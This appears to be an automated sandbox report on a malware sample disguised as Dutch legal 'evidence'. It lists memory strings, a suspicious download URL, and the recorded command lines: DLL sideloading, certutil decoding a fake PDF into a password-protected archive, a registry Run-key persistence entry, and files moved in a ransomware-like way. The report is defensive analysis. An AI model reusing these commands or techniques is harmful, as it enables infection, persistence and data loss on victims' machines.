Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14426967112.000028B201924000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14426386164.000028B201904000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14426757157.000028B20191C000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14425639600.000028B2018F4000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14427191370.000028B201934000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14426539097.000028B20190C000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14426285875.000028B2018FC000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14421551088.0000466000F04000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14420506115.0000466000EF4000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14425539175.0000466000F24000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14425306255.0000466000F1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.com/go/lic_stoor_ru
Source: adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14421551088.0000466000F04000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14420506115.0000466000EF4000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14425539175.0000466000F24000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14425306255.0000466000F1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.com/go/lic_stoor_vn
Source: adobe_licensing_wf_helper_acro.exe, 00000042.00000003.14543163224.0000441A00638000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000042.00000003.14757793161.0000441A0065C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WebReflection/url-search-params/blob/master/README.md#ios-10--other-platforms-bug
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14391598582.000028B2003D0000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14390922690.000028B200480000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14390922690.000028B200474000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14391300926.000028B200480000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14390048156.000028B2003BC000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14390810630.00004660003A0000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14391237133.0000466000480000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14391237133.0000466000474000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14390559676.00004660003BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/C/#the-details-and-summary-elements
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14391598582.000028B2003D0000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14390922690.000028B200480000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14390922690.000028B200474000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14391300926.000028B200480000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14390048156.000028B2003BC000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14390810630.00004660003A0000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14391237133.0000466000480000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14391237133.0000466000474000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14390559676.00004660003BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/rendering.html#hidden-elements
Source: Images.exe, 0000003D.00000003.14463912582.000001CC0AEEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: adobe_licensing_wf_helper_acro.exe, 00000043.00000003.14453739598.000028B202890000.00000004.00000800.00020000.00000000.sdmp, adobe_licensing_wf_helper_acro.exe, 00000044.00000003.14447120741.00004660026C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://svgwg.org/svg2-draft/single-page.html#render-OverflowAndClipProperties
Source: cmd.exe, 00000004.00000003.14481835412.000000000356C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zwaregroup.com/buildergroup/cgi-bin/bin/
Source: cmd.exe, 00000004.00000003.14183416436.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14602825173.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14235967103.0000000003545000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14483598674.0000000003557000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14810307433.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14234386046.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14486966116.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14480152392.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14481035197.0000000003557000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14237787733.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14183620980.0000000003545000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14806580445.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14183145693.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14480250264.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14491317087.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14483338235.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14488045568.0000000003470000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14812153028.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14804366911.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14482247146.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.14795047689.0000000004F90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zwaregroup.com/buildergroup/cgi-bin/bin/Adonis/Adonis_ALL

Source: unknown	Network traffic detected: HTTP traffic on port 64836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64818
Source: unknown	Network traffic detected: HTTP traffic on port 64826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64827
Source: unknown	Network traffic detected: HTTP traffic on port 64827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64866
Source: unknown	Network traffic detected: HTTP traffic on port 64846 -> 443

E-Banking Fraud

Drops certificate files (DER)

Source: C:\Users\user\Desktop\Images.exe

File created: C:\Users\Public\VIP4YmtQLN\DLLs\python_tools.cat

Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	File moved: C:\Users\user\Desktop\IPKGELNTQY.docx	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	File moved: C:\Users\user\Desktop\NEBFQQYWPS.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	File moved: C:\Users\user\Desktop\SQSJKEBWDT.mp3	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	File moved: C:\Users\user\Desktop\PIVFAGEAAV.png	Jump to behavior
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	File moved: C:\Users\user\Desktop\QNCYCDFIJJ.mp3	Jump to behavior

DDoS

Too many similar processes found

Source: cmd.exe

Process created: 42

System Summary

PE file contains executable resources (Code or Archives)

Source: synaptics.exe.61.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.61.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.61.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Sample file is different than original file name gathered from version info

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14090624716.000000006CDAE000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameVERSION.dll\ vs Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089172034.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 0has caused the Haihaisoft PDF Reader to exit. Please close all screen capture software and open the Haihaisoft PDF Reader again.\\VarFileInfo\TranslationOriginalFilename, , , , A:\B:\cccgoogledrivesync.exeaaa, Domain parse error 4./HaihaisoftWeb page content length is 0.ntdll.dllRtlGetNtVersionNumbersindivstr is empty!%s\Haihaisoft\XPDF\%s.lic%s\Haihaisoft\XPDF\V3.licindivstr2013 is empty!%s\Haihaisoft\XPDF\%s.licq1Ggw0sW0raah/rGgDOENvB7EvvftEWPYBEHVgshiJN3ce+NsnD4IzY=GetIndivStr failed. %s%s&csb=%s&usb=%d&asb=%d&ContentType=PDF<r00412b>q1Ggw0sW0raah/rGgDOENvB7EvvSvlyPYBEHVgshiJN3ce+NsnD4IzY=%s%s&csb=%s&usb=%d&asb=%d&ContentType=PDF<r00412b/>q1Ggw0sW0uacjfrJgHiUavkkB/jE9UvPfw5HBlxMndR4XemQ/3DiLmWBRkTJYQ==q1Ggw0sW0uacjfrJgHiUavU3A73dslvPdFUZAVV+xc1yZMCC5G3UN27dXVnLY9C5l7Xo..cnhttp://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD%AF%E4%BB%B6PDF%E9%98%85%E8%AF%BB%E5%99%A8.aspxopenhttp://www.haihaisoft.com/PDF_Reader_download.aspxopencng vs Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000002.14089532765.00000000009FC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamehpreader.exeL vs Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe
Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe, 00000000.00000000.14064640682.00000000006C9000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 0has caused the Haihaisoft PDF Reader to exit. Please close all screen capture software and open the Haihaisoft PDF Reader again.\\VarFileInfo\TranslationOriginalFilename, , , , A:\B:\cccgoogledrivesync.exeaaa, Domain parse error 4./HaihaisoftWeb page content length is 0.ntdll.dllRtlGetNtVersionNumbersindivstr is empty!%s\Haihaisoft\XPDF\%s.lic%s\Haihaisoft\XPDF\V3.licindivstr2013 is empty!%s\Haihaisoft\XPDF\%s.licq1Ggw0sW0raah/rGgDOENvB7EvvftEWPYBEHVgshiJN3ce+NsnD4IzY=GetIndivStr failed. %s%s&csb=%s&usb=%d&asb=%d&ContentType=PDF<r00412b>q1Ggw0sW0raah/rGgDOENvB7EvvSvlyPYBEHVgshiJN3ce+NsnD4IzY=%s%s&csb=%s&usb=%d&asb=%d&ContentType=PDF<r00412b/>q1Ggw0sW0uacjfrJgHiUavkkB/jE9UvPfw5HBlxMndR4XemQ/3DiLmWBRkTJYQ==q1Ggw0sW0uacjfrJgHiUavU3A73dslvPdFUZAVV+xc1yZMCC5G3UN27dXVnLY9C5l7Xo..cnhttp://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD%AF%E4%BB%B6PDF%E9%98%85%E8%AF%BB%E5%99%A8.aspxopenhttp://www.haihaisoft.com/PDF_Reader_download.aspxopencng vs Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Uses 32bit PE files

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Service.bat" /f

Source: classification engine

Classification label: mal40.rans.winEXE@139/1307@1/6

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\Public\VIP4YmtQLN

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\A919qm65v_fxtzpf_74o.tmp

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Service.bat" "

Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe

Source: Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\cmd.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT * FROM device_mappings WHERE( content_item_type = :resourceType);
Source: AdobeCollabSync.exe, 00000038.00000003.14822405997.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp, AdobeCollabSync.exe, 00000038.00000003.14229296686.000001993AAAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests;

Source: unknown	Process created: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe "C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe"
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\Document.pdf"
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\EFOYFBOLXA.png.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\Evidence.docx.cmd"
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\GAOBCVIQIJ.png.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\IPKGELNTQY.docx.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\LSBIHQFDVT.docx.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\LSBIHQFDVT.pdf"
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\NEBFQQYWPS.docx.cmd"
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\NEBFQQYWPS.xlsx.cmd"
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\PALRGUCVEH.mp3.cmd"
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\PIVFAGEAAV.png.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\PWCCAWLGRE.jpg.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\QNCYCDFIJJ.mp3.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\QNCYCDFIJJ.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\QNCYCDFIJJ.xlsx.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\SQSJKEBWDT.jpg.cmd"
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\SQSJKEBWDT.mp3.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\SUAVTZKNFL.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\ZQIXMVQGAH.jpg.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Desktop\\ZQIXMVQGAH.xlsx.cmd"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\LSBIHQFDVT.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Document.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\QNCYCDFIJJ.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\SUAVTZKNFL.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 /nobreak
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib -s -h -r VERSION.DLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -decode Document.pdf DzbIZ1HRMj.rar
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/24.4.20272 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\UserData" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1672,i,12053433933964087944,11760444625678437277,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c --type=collab-renderer --proc=9644
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe" -c --type=collab-renderer --proc=8876
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Desktop\Images.exe images x -pAnfoE5FeC6R5dPfRbxQgKMtZdV6v0OKC -inul -y DzbIZ1HRMj.rar C:\Users\Public\VIP4YmtQLN
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe" GetChannelUri
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe 9240
